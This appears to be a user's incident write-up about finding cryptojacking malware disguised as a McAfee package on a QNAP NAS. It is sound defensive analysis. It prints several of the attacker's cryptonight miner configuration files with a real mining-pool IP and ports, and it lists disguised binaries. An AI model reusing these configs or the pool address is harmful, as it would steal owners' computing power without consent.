[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # ls -lrt
total 4464
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:17 mscaner.aa
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.n
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.a
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:19 mscaner.nn
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:20 mscaner.x
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:21 mscaner.xx
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.bb
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.b
-rwxrwxr-x 1 admin administrators 1174680 2018-01-25 16:16 McAfeeDisk*
-rwxrwxr-x 1 admin administrators 526432 2018-02-02 08:36 McAfee*
-rwxrwxr-x 1 admin administrators 1460052 2018-02-04 09:41 ntpd*
-rwxrwxr-x 1 admin administrators 1361200 2018-02-04 10:56 qsyncsman*
-rwxr-xr-x 1 admin administrators 4426 2018-02-04 18:29 McAfee.sh*
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.a
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36487",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.aa
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36488",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.n
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36587",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.nn
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36588",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # ls -lrt
total 4464
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:17 mscaner.aa
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.n
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.a
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:19 mscaner.nn
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:20 mscaner.x
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:21 mscaner.xx
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.bb
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.b
-rwxrwxr-x 1 admin administrators 1174680 2018-01-25 16:16 McAfeeDisk*
-rwxrwxr-x 1 admin administrators 526432 2018-02-02 08:36 McAfee*
-rwxrwxr-x 1 admin administrators 1460052 2018-02-04 09:41 ntpd*
-rwxrwxr-x 1 admin administrators 1361200 2018-02-04 10:56 qsyncsman*
-rwxr-xr-x 1 admin administrators 4426 2018-02-04 18:29 McAfee.sh*
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.b
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36887",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.bb
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36888",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.x
{
"algo": "cryptonight-lite",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36687",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.xx
{
"algo": "cryptonight-lite",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36688",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
CryptoNight is a hashing algorithm for CPU mining. That shouldn't be there! Let's remove that McAfee app (using the GUI)...
[~] # ls /share/CACHEDEV1_DATA/.qpkg/ -lrt
total 16
drwxr-x--- 3 admin administrators 4096 2014-12-01 17:23 QNAP_Diagnostic_Tool/
lrwxrwxrwx 1 admin administrators 9 2015-02-19 12:23 autorun -> /dev/null
drwx------ 3 admin administrators 4096 2017-04-18 07:24 StorageExpansion/
drwxr-xr-x 7 admin administrators 4096 2017-12-29 17:00 QsyncServer/
drwxr-xr-x 2 admin administrators 4096 2018-02-08 00:44 helpdesk/
So it's gone (note I haven't tried a reboot yet though). But what happens if we reinstall the McAfee app(again using the GUI)?
[~] # ls /share/CACHEDEV1_DATA/.qpkg/ -lrt
total 20
drwxr-x--- 3 admin administrators 4096 2014-12-01 17:23 QNAP_Diagnostic_Tool/
lrwxrwxrwx 1 admin administrators 9 2015-02-19 12:23 autorun -> /dev/null
drwx------ 3 admin administrators 4096 2017-04-18 07:24 StorageExpansion/
drwxr-xr-x 7 admin administrators 4096 2017-12-29 17:00 QsyncServer/
drwxr-xr-x 2 admin administrators 4096 2018-02-08 00:44 helpdesk/
drwxr-xr-x 7 1000 1000 4096 2018-02-08 15:49 MCAFEE_QNAP/
[~] # ls /share/CACHEDEV1_DATA/.qpkg/MCAFEE_QNAP/
bin@ dat/ lib@ lib32/ lib64/ mcafee_qnap.conf* mcafee_qnap.sh* target/ tmp/
[~] # cat /share/CACHEDEV1_DATA/.qpkg/MCAFEE_QNAP/mcafee_qnap.sh
#!/bin/sh
RETVAL=0
QPKG_NAME="MCAFEE_QNAP"
dbgprint()
{
local msg="$1"
#echo "mcafee_qnap.sh: $msg" >> "/tmp/log_antivirus.txt"
echo "$msg"
}
#/sbin/log_tool -t2 -uSystem -p127.0.0.1 -mlocalhost -a "MCAFEE_QNAP_ENABLED=`/sbin/getcfg $QPKG_NAME Enable -u -d FALSE -f /etc/config/qpkg.conf` $0 $1"
_exit()
{
/bin/echo -e "Error: $*"
exit 1
}
find_base()
{
# Determine BASE installation location according to smb.conf
publicdir=`/sbin/getcfg Public path -f /etc/config/smb.conf`
if [ ! -z $publicdir ] && [ -d $publicdir ];then
publicdirp1=`/bin/echo $publicdir | /bin/cut -d "/" -f 2`
publicdirp2=`/bin/echo $publicdir | /bin/cut -d "/" -f 3`
publicdirp3=`/bin/echo $publicdir | /bin/cut -d "/" -f 4`
if [ ! -z $publicdirp1 ] && [ ! -z $publicdirp2 ] && [ ! -z $publicdirp3 ]; then
[ -d "/${publicdirp1}/${publicdirp2}/Public" ] && QPKG_BASE="/${publicdirp1}/${publicdirp2}"
fi
fi
# Determine BASE installation location by checking where the Public folder is.
if [ -z $QPKG_BASE ]; then
for datadirtest in /share/HDA_DATA /share/HDB_DATA /share/HDC_DATA /share/HDD_DATA /share/HDE_DATA /share/HDF_DATA /share/HDG_DATA /share/HDH_DATA /share/MD0_DATA /share/MD1_DATA /share/MD2_DATA /share/MD3_DATA; do
[ -d $datadirtest/Public ] && QPKG_BASE="$datadirtest/Public"
done
fi
if [ -z $QPKG_BASE ] ; then
echo "The Public share not found."
_exit 1
fi
QPKG_INSTALL_PATH="${QPKG_BASE}/.qpkg"
QPKG_DIR="${QPKG_INSTALL_PATH}/${QPKG_NAME}"
}
find_base
#source "$QPKG_DIR/mcafee_qnap.conf"
ENABLED="`/sbin/getcfg $QPKG_NAME Enable -u -d FALSE -f /etc/config/qpkg.conf`"
case "$1" in
start)
dbgprint "Generate symbolic linke /mcafee"
/bin/ln -sf $QPKG_DIR /mcafee
$0 clean
# Misora Hsu, 2016/08/25: stop install if QTS version was older than 4.2.1
QTSV=$(/sbin/getcfg -f /etc/config/uLinux.conf "System" "Version")
QTSVi=${QTSV//./}
if [ $QTSVi -lt 430 ]; then
msg="Your QTS is older than 4.3.0, use 32-bits binary."
/bin/ln -sf lib32 /mcafee/lib
/bin/ln -sf target/bin32 /mcafee/bin
else
msg="Your QTS is newer than 4.3.0, use 64-bits binary."
/bin/ln -sf lib64 /mcafee/lib
/bin/ln -sf target/bin64 /mcafee/bin
fi
echo $msg
/bin/touch /etc/config/antivirus.global
/bin/touch /etc/config/antivirus.jobs
/bin/touch /etc/config/antivirus.quarantine
/bin/touch /tmp/antivirus.lock
/bin/touch /tmp/antivirus.jobs
#Sometimes we insert firmware files into QPKG for debugging, then replcae original firmware files.
#The official QPKG should not include these files.
cat /usr/lib/libuLinux_qlicense.so.0.0 | grep Get_Status_and_ExpireDate_For_Appid_Hash 2>/dev/null 1>/dev/null
if [ $? != 0 ]; then
dbgprint "[McAfee] Fail to start. libuLinux_qlicense.so.0.0 is too old. Please update the firmware"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Fail to start. libuLinux_qlicense.so.0.0 is too old. Please update the firmware"
else
if [ -f $QPKG_DIR/target/appRequest.cgi ];then
[ -f /home/httpd/cgi-bin/application/appRequest_MCAFEE_ORG.cgi ] || /bin/mv /home/httpd/cgi-bin/application/appRequest.cgi /home/httpd/cgi-bin/application/appRequest_MCAFEE_ORG.cgi
/bin/cp -f $QPKG_DIR/target/appRequest.cgi /home/httpd/cgi-bin/application/
dbgprint "Replace firmware file: /home/httpd/cgi-bin/application/appRequest.cgi"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Replace firmware file: /home/httpd/cgi-bin/application/appRequest.cgi"
fi
if [ -f $QPKG_DIR/src-firmware/antivirus.sh ];then
[ -f /etc/init.d/antivirus_MCAFEE_ORG.sh ] || /bin/mv /etc/init.d/antivirus.sh /etc/init.d/antivirus_MCAFEE_ORG.sh
/bin/cp -f $QPKG_DIR/src-firmware/antivirus.sh /etc/init.d/
dbgprint "Replace firmware file: /etc/init.d/antivirus.sh"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Replace firmware file: /etc/init.d/antivirus.sh"
fi
if [ -f $QPKG_DIR/src-firmware/antivirus.js ];then
[ -f /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus_MCAFEE_ORG.js ] || /bin/mv /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus.js /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus_MCAFEE_ORG.js
/bin/cp -f $QPKG_DIR/src-firmware/antivirus.js /home/httpd/cgi-bin/apps/systemPreferences/functions/
dbgprint "Replace firmware file: /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus.js"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Replace firmware file: /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus.js"
fi
fi
RETVAL=0
;;
stop)
dbgprint "Remove symbolic linke /mcafee"
$0 clean
#/bin/rm /mcafee/lib
#/bin/rm /mcafee/bin
/bin/rm /mcafee
#/sbin/setcfg "Antivirus" "AntivirusEngine" "LEGACY" -f "/etc/config/antivirus.global"
RETVAL=0
;;
clean)
[ -L "/mcafee/lib/lib32" ] && /bin/rm /mcafee/lib/lib32
[ -L "/mcafee/lib/lib64" ] && /bin/rm /mcafee/lib/lib64
[ -L "/mcafee/lib" ] && /bin/rm /mcafee/lib
[ -L "/mcafee/bin" ] && /bin/rm /mcafee/bin
;;
restart)
$0 stop
$0 start
RETVAL=0
;;
*)
echo "Usage: $0 {start|stop|restart}"
exit 1
esac
exit $RETVAL
It looks very different! Much more like what you would expect. So it appears that whatever exploit that was used to gain access to the system hijacked this app to make whatever it was doing appear normal. After all, what antivirus program isn't a hog? Well that was interesting, but McAfee is basically a scam anyways so let's uninstall it (again with the GUI). QNAP has their own integrated antivirus and Malware Remover anyways. Hopefully QNAP has patched the vulnerability (possibly this one, though not everything matches) used to gain access to the system in the first place, and we have deleted the suspicious second 'admin' account revealed by looking at the Users panel in the GUI and/or checking the passwd/shadow files with cat /etc/passwd or cat /etc/shadow, so we can hope this is the end of it. But only time will tell... So better to just protect the device behind a firewall or NAT if you can.